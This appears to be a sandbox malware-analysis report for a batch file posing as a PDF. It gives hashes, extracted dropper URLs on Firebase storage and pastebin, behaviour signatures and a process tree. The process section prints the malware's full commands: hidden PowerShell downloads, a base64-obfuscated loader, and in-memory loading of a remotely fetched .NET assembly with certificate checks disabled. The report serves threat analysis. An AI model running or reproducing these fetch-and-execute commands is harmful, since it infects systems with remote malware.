Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-es -
resource tags
-
submitted
23-07-2024 17:20
General
-
Target
fv645458456550656894659461646_Pdf.bat
-
Size
28KB
-
MD5
54c9e929aa6ea3e1e5957f9b0aee4e69
-
SHA1
2c6e7d48b6951f59c4fcddfeb65b0e07e96394ac
-
SHA256
c210d65973ad42a433a440c7716e92631c14ea6614f628ed0c540fae3b54e991
-
SHA512
a075910c9707f49a9ffa6673ab2eb29ff3e0c2cabbb521ad7101c999f50bc7bd75b6e49eaa8d7f3d9db109c06bdbb56980b46317a23ed5d7d87dcacdd0e1ce2b
-
SSDEEP
12:3xzJZ+O2P5g0it981k771o3tkRXFOuHeTgQ1tgQzu0:3x2P5g0i/7ZetYV7QEQzu0
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://firebasestorage.googleapis.com/v0/b/documentos-1b4a9.appspot.com/o/2207.vbs?alt=media&token=29f70419-a771-4403-90c3-30dc64c96114
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://pastebin.com/raw/V9y5Q5vv
Signatures
-
Blocklisted process makes network request 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\fv645458456550656894659461646_Pdf.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://firebasestorage.googleapis.com/v0/b/documentos-1b4a9.appspot.com/o/2207.vbs?alt=media&token=29f70419-a771-4403-90c3-30dc64c96114', 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wscript.exewscript "C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼B2☼HU☼dQBj☼HQ☼I☼☼9☼C☼☼Jw☼w☼DE☼Jw☼7☼CQ☼dQB0☼Gc☼awBu☼C☼☼PQ☼g☼Cc☼JQBw☼Ho☼QQBj☼E8☼ZwBJ☼G4☼TQBy☼CU☼Jw☼7☼Fs☼UwB5☼HM☼d☼Bl☼G0☼LgBO☼GU☼d☼☼u☼FM☼ZQBy☼HY☼aQBj☼GU☼U☼Bv☼Gk☼bgB0☼E0☼YQBu☼GE☼ZwBl☼HI☼XQ☼6☼Do☼UwBl☼HI☼dgBl☼HI☼QwBl☼HI☼d☼Bp☼GY☼aQBj☼GE☼d☼Bl☼FY☼YQBs☼Gk☼Z☼Bh☼HQ☼aQBv☼G4☼QwBh☼Gw☼b☼Bi☼GE☼YwBr☼C☼☼PQ☼g☼Hs☼J☼B0☼HI☼dQBl☼H0☼OwBb☼FM☼eQBz☼HQ☼ZQBt☼C4☼TgBl☼HQ☼LgBT☼GU☼cgB2☼Gk☼YwBl☼F☼☼bwBp☼G4☼d☼BN☼GE☼bgBh☼Gc☼ZQBy☼F0☼Og☼6☼FM☼ZQBj☼HU☼cgBp☼HQ☼eQBQ☼HI☼bwB0☼G8☼YwBv☼Gw☼I☼☼9☼C☼☼WwBT☼Hk☼cwB0☼GU☼bQ☼u☼E4☼ZQB0☼C4☼UwBl☼GM☼dQBy☼Gk☼d☼B5☼F☼☼cgBv☼HQ☼bwBj☼G8☼b☼BU☼Hk☼c☼Bl☼F0☼Og☼6☼FQ☼b☼Bz☼DE☼Mg☼7☼Fs☼QgB5☼HQ☼ZQBb☼F0☼XQ☼g☼CQ☼dgBx☼GE☼dQBx☼C☼☼PQ☼g☼Fs☼cwB5☼HM☼d☼Bl☼G0☼LgBD☼G8☼bgB2☼GU☼cgB0☼F0☼Og☼6☼EY☼cgBv☼G0☼QgBh☼HM☼ZQ☼2☼DQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼C☼☼K☼BO☼GU☼dw☼t☼E8☼YgBq☼GU☼YwB0☼C☼☼TgBl☼HQ☼LgBX☼GU☼YgBD☼Gw☼aQBl☼G4☼d☼☼p☼C4☼R☼Bv☼Hc☼bgBs☼G8☼YQBk☼FM☼d☼By☼Gk☼bgBn☼Cg☼JwBo☼HQ☼d☼Bw☼Do☼Lw☼v☼H☼☼YQBz☼HQ☼ZQBi☼Gk☼bg☼u☼GM☼bwBt☼C8☼cgBh☼Hc☼LwBW☼Dk☼eQ☼1☼FE☼NQB2☼HY☼Jw☼p☼C☼☼KQ☼g☼Ck☼OwBb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QQBw☼H☼☼R☼Bv☼G0☼YQBp☼G4☼XQ☼6☼Do☼QwB1☼HI☼cgBl☼G4☼d☼BE☼G8☼bQBh☼Gk☼bg☼u☼Ew☼bwBh☼GQ☼K☼☼k☼HY☼cQBh☼HU☼cQ☼p☼C4☼RwBl☼HQ☼V☼B5☼H☼☼ZQ☼o☼Cc☼QwBs☼GE☼cwBz☼Ew☼aQBi☼HI☼YQBy☼Hk☼Mw☼u☼EM☼b☼Bh☼HM☼cw☼x☼Cc☼KQ☼u☼Ec☼ZQB0☼E0☼ZQB0☼Gg☼bwBk☼Cg☼JwBN☼HM☼cQBC☼Ek☼YgBZ☼Cc☼KQ☼u☼Ek☼bgB2☼G8☼awBl☼Cg☼J☼Bu☼HU☼b☼Bs☼Cw☼I☼Bb☼G8☼YgBq☼GU☼YwB0☼Fs☼XQBd☼C☼☼K☼☼n☼DY☼N☼Bh☼DE☼ZQBm☼DQ☼M☼Bh☼GE☼YgBk☼C0☼YQBh☼GY☼O☼☼t☼DE☼MgBm☼DQ☼LQBj☼Dc☼Zg☼2☼C0☼N☼Bj☼DI☼NwBj☼DM☼Mg☼1☼D0☼bgBl☼Gs☼bwB0☼CY☼YQBp☼GQ☼ZQBt☼D0☼d☼Bs☼GE☼PwB0☼Hg☼d☼☼u☼E4☼WQBT☼EE☼LwBv☼C8☼bQBv☼GM☼LgB0☼G8☼c☼Bz☼H☼☼c☼Bh☼C4☼OQBh☼DQ☼Yg☼x☼C0☼cwBv☼HQ☼bgBl☼G0☼dQBj☼G8☼Z☼☼v☼GI☼Lw☼w☼HY☼LwBt☼G8☼Yw☼u☼HM☼aQBw☼GE☼ZQBs☼Gc☼bwBv☼Gc☼LgBl☼Gc☼YQBy☼G8☼d☼Bz☼GU☼cwBh☼GI☼ZQBy☼Gk☼Zg☼v☼C8☼OgBz☼H☼☼d☼B0☼Gg☼Jw☼g☼Cw☼I☼☼k☼HU☼d☼Bn☼Gs☼bg☼g☼Cw☼I☼☼n☼F8☼XwBf☼F8☼XwBf☼F8☼XwBp☼Hk☼YgBi☼HU☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼LQ☼t☼C0☼LQ☼t☼C0☼LQ☼n☼Cw☼I☼☼k☼HY☼dQB1☼GM☼d☼☼s☼C☼☼Jw☼x☼Cc☼L☼☼g☼Cc☼UgBv☼GQ☼YQ☼n☼C☼☼KQ☼p☼Ds☼';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs');powershell -command $KByHL;3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$vuuct = '01';$utgkn = 'C:\Users\Admin\AppData\Local\Temp\Diazepan.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $vqauq = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($vqauq).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('64a1ef40aabd-aaf8-12f4-c7f6-4c27c325=nekot&aidem=tla?txt.NYSA/o/moc.topsppa.9a4b1-sotnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $utgkn , '________iybbu____________________________________-------', $vuuct, '1', 'Roda' ));"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5a958447eb04bdb5f4ecf9ff291884946
SHA14d5ffda96a16ba7d0df252521ddde378ae6665a7
SHA256aa05cb9b41c6799452c75ce1ec9a6ae20258b6aadbe1a98d7aac234abb188723
SHA512c1f2fc24f33b238a9e3a5f22b3b4e69103b9eda9fff8d8a14984a5754a5c8a231eeb8f5d859563d70eef0aead1cf032c64161bbc143cf39956b4968307b944b3
-
Filesize
7KB
MD50d8d87fe5fe29f15386d0071ba4c7f38
SHA12a64c94fd3b3d6f8574808d2514d17a4200bf101
SHA25643c77199e2386f22aff9cc2a5a376fe0733b2bd531e065573b27502847ca037d
SHA5126f3401f7d41f81100b06338f0f2fd99a057c4b24ae341c0e25074a3b9ebbc070110732247d44e6ef347b45aad3a882a3964ce3006b752e66b327dd82a464035f
-
Filesize
216KB
-
Filesize
312KB
-
Filesize
32KB
-
Filesize
280KB
-
Filesize
40KB
-
Filesize
56KB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
280KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
40KB
-
Filesize
56KB
-
Filesize
312KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
2.9MB